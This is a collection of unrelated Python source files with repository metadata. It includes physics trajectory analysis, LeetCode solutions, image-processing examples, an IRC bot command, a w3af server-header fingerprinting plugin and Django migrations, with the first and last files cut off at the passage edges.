nfil = int(order_tmax*value(fname_plas, 'npoints') + 1)
ncol = 6 # nro de columnas x archivo: (t, x, y, z, mu, err-gamma)
NBs = int(value(fname_plas, 'nro_Bfield_realizations'))
rigidity = value(fname_plas, 'rigidity')
#--------------
Nm = int(value(fname_turb, 'n_modos'))
Bo = value(fname_turb, 'Bunif')
Sig = value(fname_turb, 'sigma_Bo_ratio')
perc_2d = value(fname_turb, 'percent_2d')
perc_slab = value(fname_turb, 'percent_slab')
Lc_2d = value(fname_turb, 'Lc_2d')
Lc_slab = value(fname_turb, 'Lc_slab')
lambda_min = value(fname_turb, 'lambda_min')
lambda_max = value(fname_turb, 'lambda_max')
print " ------> Ek [eV]: %g" % Ek
calc_k_versus_t(dir_data, Ek, Sig, NPLAS, NBs, nfil, ncol, Bo,
Lc_2d, Lc_slab, Nm, perc_slab)
def calc_k_versus_t(dir_data, Ek, Sig, NPLAS, NBs, nfil, ncol, Bo,
Lc_2d, Lc_slab, Nm, perc_slab):
dir_plots = '../../plots'
#dir_data= '../../output/Ek.%1.1eeV/sig%d' % (Ek, Sig)
"""dir_out = '../../post/Ek.%1.1eeV/Nm%03d/slab%1.2f/sig.%1.1e/Lc2D.%1.1e_LcSlab.%1.1e' % (Ek, Nm, perc_slab, Sig, Lc_2d, Lc_slab)
try: os.system('mkdir %s' % dir_out)
except: print ""
"""
dir_out = '../../post'
fname_out = '%s/k_vs_t_Ek.%1.1eeV_Nm%03d_slab%1.2f_sig.%1.1e_Lc2d.%1.1e_LcSlab.%1.1e.dat' % (dir_out, Ek, Nm, perc_slab, Sig, Lc_2d, Lc_slab)
#---------------------
# nok : nro de files q existe Y tienen data
# nbad : nro de files q solicite y no existen
# time : grilla temporal
DATA, time, nok, nbad = load_trajectories(NBs, NPLAS, nfil, ncol, dir_data)
print " nro de plas: ", NPLAS
print " nro de B-realizations: ", NBs
print " nro de ptos por trayectoria: %d\n" % nfil
print " nro de archivos q existe c/data: %d/%d " % (nok, nok+nbad)
print " nro de archivos q pedi y NO existen: %d/%d " % (nbad, nok+nbad)
#---------------------
every = 1 # no en c/tiempo, sino cada 'every'
tt, x2, y2, z2 = sqr_deviations(DATA, time, every)
AUinkm = 1.5e8
AUincm = AUinkm*1e5 # [cm]
r2 = x2 + y2
r2 = r2*AUincm**2 # [cm^2]
x2 = x2*AUincm**2 # [cm^2]
y2 = y2*AUincm**2 # [cm^2]
z2 = z2*AUincm**2 # [cm^2]
wc = calc_omega(Bo, Ek) #4.781066E-01 #4.325188E-01 #Ek=1e8eV #4.735689E-01 # Ek=1e7eV #4.781066E-01 # Ek=1e6eV
print " wc[s-1]: ", wc
tt = tt*wc # [1]
#-------------------
kxx = x2/(2.*tt/wc) # [cm2/s]
kyy = y2/(2.*tt/wc) # [cm2/s]
kzz = z2/(2.*tt/wc) # [cm2/s]
#-- guarda data kxx(t)
data_out = array([tt, kxx, kyy, kzz]).T
data_out = data_out[1:] # el 1er tiempo no lo guardo xq es division por zero 1/2t
print " ---> guardando: %s" % fname_out
print ""
savetxt(fname_out, data_out, fmt='%12.2f')
|
[
"jimmy.ilws@gmail.com"
] |
jimmy.ilws@gmail.com
|
566ce5e5e8474e086d441fd7c8275b972cf78d88
|
45c170fb0673deece06f3055979ece25c3210380
|
/toontown/building/DoorTypes.py
|
80898b9b1397fad9906528cf98341b9f7b720109
|
[] |
no_license
|
MTTPAM/PublicRelease
|
5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f
|
825f562d5021c65d40115d64523bb850feff6a98
|
refs/heads/master
| 2021-07-24T09:48:32.607518
| 2018-11-13T03:17:53
| 2018-11-13T03:17:53
| 119,129,731
| 2
| 6
| null | 2018-11-07T22:10:10
| 2018-01-27T03:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
#Embedded file name: toontown.building.DoorTypes
EXT_STANDARD = 1
INT_STANDARD = 2
EXT_HQ = 3
INT_HQ = 4
EXT_HOUSE = 5
INT_HOUSE = 6
EXT_COGHQ = 7
INT_COGHQ = 8
EXT_KS = 9
INT_KS = 10
EXT_ANIM_STANDARD = 11
|
[
"linktlh@gmail.com"
] |
linktlh@gmail.com
|
de4286376cdead9bc0b4496d09485374ed60e6cc
|
7202b4cf562fcacf2f684c1985b448b5780c4967
|
/itp1/07c.py
|
6be9c7cdedee836bbe698a934c291f7e9f692031
|
[] |
no_license
|
mskt4440/AOJ
|
ce523182dbd75e85c1bba43d7d23217711b8e617
|
f6d9ca36e77a88ed9ddbeb53340a745bf8cac157
|
refs/heads/master
| 2021-07-07T00:34:23.034606
| 2020-09-24T02:25:43
| 2020-09-24T02:25:43
| 188,768,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
#
# 7c
#
def main():
r, c = map(int, input().split())
T = []
S = [0 for _ in range(c+1)]
for i in range(r):
C = list(map(int, input().split()))
C.append(sum(C))
T.append(C)
for i in range(r):
for j in range(c+1):
S[j] += T[i][j]
T.append(S)
for i in range(r+1):
print(*T[i])
if __name__ == '__main__':
main()
|
[
"mskt4440@gmail.com"
] |
mskt4440@gmail.com
|
ed43ef6c060ebc2daed645b5f334029f9b430d09
|
95d20fe737d711cf92d68130eb59b6aef4435ec2
|
/正则表达式/非捕获分组.py
|
651491d6f2bb7a136ac85dd6e1b2fef4dc0d1d70
|
[] |
no_license
|
CCH21/Python
|
d11b93851579d85f972828c760a96c5be1f79531
|
33e218810856971f3f1f97a2b8a4c8dce761362e
|
refs/heads/master
| 2022-04-29T11:48:01.816283
| 2022-03-17T11:53:01
| 2022-03-17T11:53:01
| 226,452,057
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
import re
s = 'imgl.jpg, img2.jpg, img3.bmp'
# 捕获分组
p = r'\w+(\.jpg)'
mlist = re.findall(p, s)
print(mlist)
# 非捕获分组
p = r'\w+(?:\.jpg)'
mlist = re.findall(p, s)
print(mlist)
|
[
"1398635912@qq.com"
] |
1398635912@qq.com
|
82b049d66f3602dbc6cae01e74fd629f0634ef53
|
b4cf3438011c9521561143e677736c611ff19a0c
|
/boxx/ylsys.py
|
7643ca805dfe8ff7b284b931db1a46f85be72c4c
|
[] |
no_license
|
BUCT-Vision/boxx
|
3e5c24af20c06d4943dc04859e6cbfb577fe8a48
|
3d405c9ad744d2ff9f6f5d9efb1e31962474565b
|
refs/heads/master
| 2020-03-18T17:35:18.573106
| 2018-09-18T02:49:10
| 2018-09-18T02:49:10
| 135,037,392
| 2
| 0
| null | 2018-09-18T02:49:11
| 2018-05-27T10:44:44
|
Python
|
UTF-8
|
Python
| false
| false
| 3,683
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
A module provide system info and Python Info for boxx
@author: yanglei
"""
import sys, os
from os import environ
def jupyterNotebookOrQtConsole():
env = 'Unknow'
cmd = 'ps -ef'
try:
with os.popen(cmd) as stream:
if not py2:
stream = stream._stream
s = stream.read()
pid = os.getpid()
ls = list(filter(lambda l:'jupyter' in l and str(pid) in l.split(' '), s.split('\n')))
if len(ls) == 1:
l = ls[0]
import re
pa = re.compile(r'kernel-([-a-z0-9]*)\.json')
rs = pa.findall(l)
if len(rs):
r = rs[0]
if len(r)<12:
env = 'qtipython'
else :
env = 'jn'
return env
except:
return env
print(r, env)
pyv = sys.version_info.major
py3 = (pyv == 3)
py2 = (pyv == 2)
linuxYl = sys.platform.startswith('linux')
winYl = sys.platform.startswith('win')
osxYl = sys.platform.startswith('darwin')
import multiprocessing as __module
cpun = __module.cpu_count()
cloud = cpun > 16
if linuxYl or osxYl:
cuda = not os.system('nvcc --version> /dev/null 2>&1')
elif winYl:
import subprocess
try:
cuda = not subprocess.call('nvcc --version', creationflags=0x00000008)
except FileNotFoundError:
cuda = False
usecuda = 'auto' # auto: auto, False: not use
if linuxYl or osxYl:
homeYl = os.getenv('HOME') + '/'
tmpYl = '/tmp/'
elif winYl:
homeYl = os.path.expanduser("~")
tmpYl = os.getenv('TMP') + '\\'
class __TmpboxxWithCall(str):
'''
the tmp dir for boxx
use tmpboxx() to get tmpdir
if not exist then will auto mkdir of boxxTmp in `/tmp`
'''
def __call__(self):
if not os.path.isdir(self):
os.makedirs(self)
return self
tmpboxx = __TmpboxxWithCall(os.path.join(tmpYl,'boxxTmp/'))
class PythonInfo():
'''
python info
plt : Bool
mean plt avaliable
env :
belong [cmd, cmdipython, qtipython, spyder, jn]
'''
pid = os.getpid()
gui = 'ipykernel' in sys.modules
cmdipython = 'IPython' in sys.modules and not gui
ipython = cmdipython or gui
spyder = 'spyder' in sys.modules
if gui:
env = 'spyder' if spyder else jupyterNotebookOrQtConsole()
else:
env = 'cmdipython' if ipython else 'cmd'
cmd = not ipython
qtipython = env == 'qtipython'
jn = env == 'jn'
interactive = bool(getattr(sys, 'ps1', sys.flags.interactive))
plt = True
if not gui and linuxYl and 'DISPLAY' not in os.environ :
plt = False
reloadplt = False
def __str__(self):
from boxx import strMethodForDiraAttrs
return strMethodForDiraAttrs(self)
__repr__ = __str__
pyi = PythonInfo()
class SystemInfo():
'''
sys info
'''
pyv = pyv
cpun = cpun
cuda = cuda
tmp = tmpYl
linux = linuxYl
win = winYl
osx = osxYl
os = sys.platform
display = True
if linuxYl:
display = 'DISPLAY' in environ and environ['DISPLAY']
gui = pyi.gui or display
if 0:
@property
def ip(self):
'''
TODO:
'''
return '127.0.0.1'
@property
def user(self):
import getpass
return getpass.getuser()
@property
def host(self):
import platform
return platform.node()
def __str__(self):
from boxx import strMethodForDiraAttrs
return strMethodForDiraAttrs(self)
__repr__ = __str__
sysi = SystemInfo()
|
[
"ylxx@live.com"
] |
ylxx@live.com
|
05f71de710935c9f61b9d68da2dd6130d14c0aef
|
76027f6d013e12ca4fda95957e0cedbef1779def
|
/leetcode/84-Hard-Largest-Rectangle-In-Histogram/answer.py
|
73fea12149d06b2de3f14d2834336d5e705517c6
|
[
"Unlicense"
] |
permissive
|
BenDataAnalyst/Practice-Coding-Questions
|
79a56617f27a5b2b8d5d9650057a9b0128b9becf
|
4c21ab38b75389cfb71f12f995e3860e4cd8641a
|
refs/heads/master
| 2020-07-23T13:31:48.965116
| 2019-09-09T16:23:09
| 2019-09-09T16:23:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,555
|
py
|
#!/usr/bin/python3
#------------------------------------------------------------------------------
# Solution O(n) Stack Solution
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
heights.append(0)
stack = [-1]
result = 0
for i in range(len(heights)):
while heights[i] < heights[stack[-1]]:
h = heights[stack.pop()]
w = i - stack[-1] - 1
result = max(result, h * w)
stack.append(i)
return result
#------------------------------------------------------------------------------
# Solution O(n) Kinda DP Solution
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
result = 0
# Left and right will be a cache to hold the number of bars to left and right >= curr height
left = [1 for _ in range(len(heights))]
right = [1 for _ in range(len(heights))]
# Calculate left
for i in range(len(heights)):
l = i-1
# Grow as far left as possible
# We make jumps based on the previously computed left values
while l >= 0:
if heights[l] >= heights[i]:
left[i] += left[l]
l -= left[l]
else:
break
# Calculate right
for i in range(len(heights)):
r = i+1
# Grow as far right as possible
# We make jumps based on the previously computed right values
while r < len(heights):
if heights[r] >= heights[i]:
right[i] += right[r]
r += right[r]
else:
break
# Now we can iterate through all of our possible rectangles
# We calculate our areas with our height * width (left+right)
for i in range(len(heights)):
result = max(result, heights[i] * (left[i] + right[i] - 1))
return result
#------------------------------------------------------------------------------
# Brute Force Solution (O(n^2))
#------------------------------------------------------------------------------
class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
result = 0
# Find the max area for each bar i
for i in range(len(heights)):
area = heights[i]
l, r = i-1, i+1
# Grow as far left as possible
while l >= 0:
if heights[l] >= heights[i]:
area += heights[i]
l -= 1
else:
break
# Grow as far right as possible
while r < len(heights):
if heights[r] >= heights[i]:
area += heights[i]
r += 1
else:
break
result = max(result, area)
return result
#------------------------------------------------------------------------------
|
[
"kylelim8998@gmail.com"
] |
kylelim8998@gmail.com
|
1523bd6cee28d5286c62ffee8fe3728695519c71
|
7deda84f7a280f5a0ee69b98c6a6e7a2225dab24
|
/Manage/migrations/0015_draft_request_user.py
|
5f6519727e28bb0c0b16dca2a87445ff181ff05d
|
[] |
no_license
|
Cornex-Inc/Coffee
|
476e30f29412373fb847b2d518331e6c6b9fdbbf
|
fcd86f20152e2b0905f223ff0e40b1881db634cf
|
refs/heads/master
| 2023-01-13T01:56:52.755527
| 2020-06-08T02:59:18
| 2020-06-08T02:59:18
| 240,187,025
| 0
| 0
| null | 2023-01-05T23:58:52
| 2020-02-13T05:47:41
|
Python
|
UTF-8
|
Python
| false
| false
| 401
|
py
|
# Generated by Django 2.1.15 on 2020-05-04 22:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Manage', '0014_auto_20200503_1043'),
]
operations = [
migrations.AddField(
model_name='draft',
name='request_user',
field=models.CharField(default='', max_length=64),
),
]
|
[
"khm4321@naver.com"
] |
khm4321@naver.com
|
02d97dde72d76aa6fba06b86768511a2925fe6f3
|
d9b53673b899a9b842a42060740b734bf0c63a31
|
/leetcode/python/medium/p494_findTargetSumWays.py
|
44d6f3cbbfbba1910bfe6c636afae6b5d7481421
|
[
"Apache-2.0"
] |
permissive
|
kefirzhang/algorithms
|
a8d656774b576295625dd663154d264cd6a6a802
|
549e68731d4c05002e35f0499d4f7744f5c63979
|
refs/heads/master
| 2021-06-13T13:05:40.851704
| 2021-04-02T07:37:59
| 2021-04-02T07:37:59
| 173,903,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 969
|
py
|
class Solution:
def __init__(self):
self.helper = {}
def findTargetSumWays(self, nums, S: int) -> int:
if not nums:
return 0
if self.helper.__contains__(tuple([len(nums), S])):
return self.helper[tuple([len(nums), S])]
if len(nums) == 1:
if S == nums[0] and S == -nums[0]:
self.helper[tuple([len(nums), S])] = 2
return 2
elif S == nums[0] or S == -nums[0]:
self.helper[tuple([len(nums), S])] = 1
return 1
else:
self.helper[tuple([len(nums), S])] = 0
return 0
num = self.findTargetSumWays(nums[:-1], S + nums[-1]) + self.findTargetSumWays(nums[:-1], S - nums[-1])
self.helper[tuple([len(nums), S])] = num
return num
slu = Solution()
print(slu.findTargetSumWays([2, 20, 24, 38, 44, 21, 45, 48, 30, 48, 14, 9, 21, 10, 46, 46, 12, 48, 12, 38], 48))
|
[
"8390671@qq.com"
] |
8390671@qq.com
|
74dc0695aadeb764d830515c0fcfee9c3c7fce09
|
5f4e13201d4c5b7edc8dbbda289380682a187bec
|
/deps/scikit-image/doc/examples/filters/plot_deconvolution.py
|
e934221396c76735c9652da0a75a70f6b0ab65a3
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
intellivoid/CoffeeHousePy
|
92f4fb344de757837c3d3da05cb5513e90408039
|
57c453625239f28da88b88ddd0ae5f1ecdd4de3c
|
refs/heads/master
| 2023-02-23T14:32:01.606630
| 2021-01-28T02:57:10
| 2021-01-28T02:57:10
| 324,419,067
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,678
|
py
|
"""
=====================
Image Deconvolution
=====================
In this example, we deconvolve an image using Richardson-Lucy
deconvolution algorithm ([1]_, [2]_).
The algorithm is based on a PSF (Point Spread Function),
where PSF is described as the impulse response of the
optical system. The blurred image is sharpened through a number of
iterations, which needs to be hand-tuned.
.. [1] William Hadley Richardson, "Bayesian-Based Iterative
Method of Image Restoration",
J. Opt. Soc. Am. A 27, 1593-1607 (1972), :DOI:`10.1364/JOSA.62.000055`
.. [2] https://en.wikipedia.org/wiki/Richardson%E2%80%93Lucy_deconvolution
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import convolve2d as conv2
from skimage import color, data, restoration
astro = color.rgb2gray(data.astronaut())
psf = np.ones((5, 5)) / 25
astro = conv2(astro, psf, 'same')
# Add Noise to Image
astro_noisy = astro.copy()
astro_noisy += (np.random.poisson(lam=25, size=astro.shape) - 10) / 255.
# Restore Image using Richardson-Lucy algorithm
deconvolved_RL = restoration.richardson_lucy(astro_noisy, psf, iterations=30)
fig, ax = plt.subplots(nrows=1, ncols=3, figsize=(8, 5))
plt.gray()
for a in (ax[0], ax[1], ax[2]):
a.axis('off')
ax[0].imshow(astro)
ax[0].set_title('Original Data')
ax[1].imshow(astro_noisy)
ax[1].set_title('Noisy data')
ax[2].imshow(deconvolved_RL, vmin=astro_noisy.min(), vmax=astro_noisy.max())
ax[2].set_title('Restoration using\nRichardson-Lucy')
fig.subplots_adjust(wspace=0.02, hspace=0.2,
top=0.9, bottom=0.05, left=0, right=1)
plt.show()
|
[
"netkas@intellivoid.info"
] |
netkas@intellivoid.info
|
739a057d4d441fd18cf2d851c70c964bdf3dd74e
|
9f1b8a1ada57198e2a06d88ddcdc0eda0c683df7
|
/submission - Homework1/ALEXANDER T KOHLROSER_2240_assignsubmission_file_HW1/HW1/index_nested_list.py
|
ca01168c4a25471ab1064be8afb0e0ea61dca486
|
[] |
no_license
|
sendurr/spring-grading
|
90dfdced6327ddfb5c311ae8f42ae1a582768b63
|
2cc280ee3e0fba02e95b6e9f45ad7e13bc7fad54
|
refs/heads/master
| 2020-04-15T17:42:10.781884
| 2016-08-29T20:38:17
| 2016-08-29T20:38:17
| 50,084,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
q = [['a','b','c'],['d','e','f'],['g','h',]]
print q[0][0]
#calls the top right
print q[1]
#calls the middle row
print q[2][1]
#calls the second column of the third row
print q[-1][-2]
print("This calls [2][0] because it goes one left from the first place which would then call the equivalent of [2]. Then it travels two left of the g, which would call g also.")
#ends the code
|
[
"sendurr@hotmail.com"
] |
sendurr@hotmail.com
|
fc884806482e9cabe64688601017f54570459f99
|
515a97129ce1b2b8eecca4b2087fde8985b82d5b
|
/Code-Scraps/old_modules/SpiceGif/gif/Thumbs_Up.py
|
cd3625bd689d898907897679c0cf84a12536f03c
|
[] |
no_license
|
SpiceBot/scraps
|
3ad6e81ac75e2b6a684fea64eb7e75477b0f4f63
|
90125e1397b57ac87cae5f3e506363aa04ddffdc
|
refs/heads/master
| 2020-05-02T21:51:01.297114
| 2019-03-28T15:38:28
| 2019-03-28T15:38:28
| 178,232,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import unicode_literals, absolute_import, print_function, division
import sopel.module
import urllib2
import json
from BeautifulSoup import BeautifulSoup
from random import randint
import sys
import os
moduledir = os.path.dirname(__file__)
shareddir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(shareddir)
from BotShared import *
gifshareddir = os.path.dirname(os.path.dirname(__file__))
sys.path.append(gifshareddir)
from GifShared import *
@sopel.module.commands('thumbsup')
def mainfunction(bot, trigger):
enablestatus, triggerargsarray, botcom, instigator = spicebot_prerun(bot, trigger, trigger.group(1))
if not enablestatus:
# IF "&&" is in the full input, it is treated as multiple commands, and is split
commands_array = spicemanip(bot, triggerargsarray, "split_&&")
if commands_array == []:
commands_array = [[]]
for command_split_partial in commands_array:
triggerargsarray_part = spicemanip(bot, command_split_partial, 'create')
execute_main(bot, trigger, triggerargsarray_part, botcom, instigator)
def execute_main(bot, trigger, triggerargsarray, botcom, instigator):
gif = getGif(bot, {"query": "thumbs up"})
instigator = trigger.nick
responsemsg = [' a thumbs up.', ' a pat on the back.', ' a sarcastic smile.', ' a high five.']
if not gif["error"]:
osd(bot, trigger.sender, 'say', "%s Result (#%s): %s" % (gif['gifapi'].title(), gif['returnnum'], gif['returnurl']))
else:
osd(bot, trigger.sender, 'action', 'gives ' + instigator + random.choice(responsemsg))
|
[
"sam@deathbybandaid.net"
] |
sam@deathbybandaid.net
|
3b5c2be55f423005b409da55eb4cb003a822b22f
|
84c9a6fb5e18741f14a55d0d737e2a556383770d
|
/venv/Lib/site-packages/w3af/plugins/infrastructure/server_header.py
|
9b95285e772beba1b79e247989486a937a290603
|
[] |
no_license
|
AravindChan96/Vulcan
|
638a1db2f84df08bc50dd76c7f142014d529fbec
|
5548a6f36f04108ac1a6ed8e707930f9821f0bd9
|
refs/heads/master
| 2022-11-05T15:05:54.224578
| 2020-06-19T20:44:14
| 2020-06-19T20:44:14
| 273,396,348
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,343
|
py
|
"""
server_header.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from threading import RLock
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
from w3af.core.controllers.plugins.infrastructure_plugin import InfrastructurePlugin
from w3af.core.data.url.helpers import is_no_content_response
from w3af.core.data.kb.info import Info
class server_header(InfrastructurePlugin):
"""
Identify the server type based on the server header.
:author: Andres Riancho (andres.riancho@gmail.com)
"""
def __init__(self):
InfrastructurePlugin.__init__(self)
# Internal variables
self._server_headers = set()
self._x_powered = set()
self._lock = RLock()
def discover(self, fuzzable_request, debugging_id):
"""
Nothing strange, just do a GET request to the url and save the server headers
to the kb. A smarter way to check the server type is with the hmap plugin.
:param debugging_id: A unique identifier for this call to discover()
:param fuzzable_request: A fuzzable_request instance that contains
(among other things) the URL to test.
"""
response = self._uri_opener.GET(fuzzable_request.get_url(), cache=True)
with self._lock:
self._check_server_header(fuzzable_request, response)
self._check_x_power(fuzzable_request, response)
def _check_server_header(self, fuzzable_request, response):
"""
HTTP GET and analyze response for server header
"""
if is_no_content_response(response):
#
# UrlOpenerProxy(), a helper class used by most plugins, will
# generate 204 HTTP responses for HTTP requests that fail.
# This makes plugins have less error handling code (try/except),
# and looks like this in the scan log:
#
# Generated 204 "No Content" response (id:2131)
#
# The problem is that in some strange cases, like this plugin,
# the 204 response will trigger a false positive. Because of
# that I had to add this if statement to completely ignore
# the HTTP responses with 204 status code
#
return
server, header_name = response.get_headers().iget('server')
if server in self._server_headers:
return
self._server_headers.add(server)
if server:
desc = 'The server header for the remote web server is: "%s".'
desc %= server
i = Info('Server header', desc, response.id, self.get_name())
i['server'] = server
i.add_to_highlight(header_name + ':')
om.out.information(i.get_desc())
# Save the results in the KB so the user can look at it
kb.kb.append(self, 'server', i)
# Also save this for easy internal use
# other plugins can use this information
kb.kb.raw_write(self, 'server_string', server)
else:
# strange !
desc = ('The remote HTTP Server omitted the "server" header in'
' its response.')
i = Info('Omitted server header', desc, response.id,
self.get_name())
om.out.information(i.get_desc())
# Save the results in the KB so that other plugins can use this
# information
kb.kb.append(self, 'omitted_server_header', i)
# Also save this for easy internal use
# other plugins can use this information
kb.kb.raw_write(self, 'server_string', '')
def _check_x_power(self, fuzzable_request, response):
"""
Analyze X-Powered-By header.
"""
for header_name in response.get_headers().keys():
for needle in ['ASPNET', 'POWERED']:
if needle in header_name.upper():
powered_by = response.get_headers()[header_name]
if powered_by in self._x_powered:
return
self._x_powered.add(powered_by)
desc = 'The %s header for the target HTTP server is "%s".'
desc %= (header_name, powered_by)
i = Info('Powered-by header', desc, response.id, self.get_name())
i['powered_by'] = powered_by
i.add_to_highlight(header_name + ':')
om.out.information(i.get_desc())
# Save the results in the KB so that other plugins can
# use this information. Before knowing that some servers
# may return more than one poweredby header I had:
#
# kb.kb.raw_write( self , 'powered_by' , powered_by )
#
# But I have seen an IIS server with PHP that returns
# both the ASP.NET and the PHP headers
kb.kb.append(self, 'powered_by', i)
# Save the list to the KB
kb.kb.raw_write(self, 'powered_by_string', list(powered_by))
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This plugin GETs the server header and saves the result to the
knowledge base.
Nothing strange, just do a GET request to the url and save the server
headers to the kb. A smarter way to check the server type is with the
hmap plugin.
"""
|
[
"aravindchan.96@gmail.com"
] |
aravindchan.96@gmail.com
|
4b83674f41dfe0e01b5e0deb3e30fb897f25bc5a
|
977f1105b3a475055631689523b1dcef951c7f72
|
/py_numpy_1.py
|
2110065b1ebc86effcb568fa5a0643b2def8ba8a
|
[] |
no_license
|
pbarton666/PES_Python_examples_and_solutions
|
2f973296796d91a5c8c28000002b996ef143ebb2
|
94fc2c8101a6e654a3ab67b39d1878b9d9f6aa74
|
refs/heads/master
| 2021-01-10T22:45:27.446831
| 2017-05-14T17:11:52
| 2017-05-14T17:11:52
| 70,357,916
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,327
|
py
|
#py_numpy_1.py
"""a snake-charming application"""
from PIL import Image
import numpy as np
import os
idir =os.getcwd()
iname= 'eastern_coral_1_clean.png'# 'white_snake.PNG'
saveas='new_snake.PNG'
#sets up an array for pixel processing
white=np.array([255,255,255,0]) #r, g, b, a
transparent = np.array([0, 0, 0, 0])
background = white
#open the image and convert it
raw_image = Image.open(iname)
raw_image.show()
converted_image = raw_image.convert('RGBA')
raw_image.close()
h, w = converted_image.size
converted_histo=converted_image.histogram()
converted_colors=converted_image.getcolors(w*h)
#dump the data into a numpy array and split the channels "bands"
data = np.array(converted_image) # h * w * 4 array (rgba)
r, g, b, a = data.T
#this sets the masking condition and replaces the background color
replace = (r == background[0]) & (b == background[1]) & (g == background[2])
data[replace.T] = (0,0,0,0)
#generate a new image, grab some stats, and save it.
new_image = Image.fromarray(data, 'RGBA')
h, w = new_image.size
new_histo=new_image.histogram()
new_colors=new_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
new_image.save(saveas)
recovered_image = Image.open(saveas)
h, w = recovered_image.size
#we've successfully 'masked out' and replaced the background
new_image.show()
recovered_histo=recovered_image.histogram()
recovered_colors=recovered_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
#but we can do more...
#strategy: make a list of color bins we expect to find. These will have pixel ranges
# that are human-friendly e.g., 'brownish', 'gold'. Each spec within the bin can be
# additively applied to a mask - functionally reducing the color palette.
reduced_image = recovered_image.convert('P', palette=Image.ADAPTIVE, colors=10)
reduc1 = reduced_image = recovered_image.convert('P', palette=Image.ADAPTIVE, colors=10)
reduc2 = reduc1.convert('RGB') #turns it to rgb
#save the image in a couple formats
reduc_fn = 'scratch.BMP'
reduc2.save(reduc_fn)
reduced_histo=reduced_image.histogram()
reduced_colors=reduced_image.getcolors(w*h) #a list of tuples [count (rgba), ...]
reduced_image.save(saveas+'reduced.BMP')
#now show them
recovered_image.show()
reduced_image.show()
recovered_image.close()
|
[
"barton.pj@gmail.com"
] |
barton.pj@gmail.com
|
dca9fddc3b23f660445b7dfdc4fa69e6a6bfd984
|
56abd8f94a511ae0d163161cb2f5e0a91d4b8bed
|
/datahub/event/migrations/0014_update_permissions_django_21.py
|
c27dc191d9543f8aa33c9c96a70980890b259390
|
[
"MIT"
] |
permissive
|
cgsunkel/data-hub-api
|
994c58bd975d902bf2bc44b415a5892919ff4539
|
a92faabf73fb93b5bfd94fd465eafc3e29aa6d8e
|
refs/heads/develop
| 2023-05-31T22:35:56.344904
| 2021-06-30T11:23:06
| 2021-06-30T11:23:06
| 303,947,456
| 0
| 0
|
MIT
| 2021-06-30T10:34:50
| 2020-10-14T08:14:46
|
Python
|
UTF-8
|
Python
| false
| false
| 381
|
py
|
# Generated by Django 2.0.8 on 2018-08-03 14:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('event', '0013_add_default_id_for_metadata'),
('core', '0003_rename_read_permissions'),
]
operations = [
migrations.AlterModelOptions(
name='event',
options={},
),
]
|
[
"reupen@users.noreply.github.com"
] |
reupen@users.noreply.github.com
|
80c5c7cf5342a44c5852c7740bd5710c955ced36
|
6b201605227f11880c1d32c9cad300f6e29ff4ae
|
/Python/Buch_Python3_Das_umfassende_Praxisbuch/Kapitel_07_Sequenzen_Mengen_und_Generatoren/08_chapter_07_repetition_questions.py
|
0c221875dd13afd534b86ec96cd3820a2eaca0c7
|
[
"MIT"
] |
permissive
|
Apop85/Scripts
|
e2e8e6ed0c0da08a4d7c895aa366c9305197137b
|
467c34e59f2708f2d2f8bb369c36fd782d365e8b
|
refs/heads/master
| 2022-12-08T08:11:04.566376
| 2022-05-13T13:17:04
| 2022-05-13T13:17:04
| 164,251,836
| 0
| 0
|
MIT
| 2022-12-08T01:50:22
| 2019-01-05T21:16:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,887
|
py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
###
# File: 08_chapter_07_repetition_questions.py
# Project: Kapitel_07_Sequenzen_Mengen_und_Generatoren
# Created Date: Tuesday 05.03.2019, 16:17
# Author: Apop85
# -----
# Last Modified: Tuesday 05.03.2019, 16:43
# -----
# Copyright (c) 2019 Apop85
# This software is published under the MIT license.
# Check http://www.opensource.org/licenses/MIT for further informations
# -----
# Description:
###
import re
def output(title, string):
max_length=80
max_delta=20
string+=' '*max_length
print('╔'+'═'*max_length+'╗')
print('║'+title.center(max_length).upper()+'║')
print('╠'+'═'*max_length+'╣')
search_pattern=re.compile(r'(.{'+str(max_length-max_delta-10)+r','+str(max_length-10)+r'}[^\w"])')
reg_lines=search_pattern.findall(string)
for line in reg_lines:
print('║ '+line+' '*(max_length-len(line)-1)+'║')
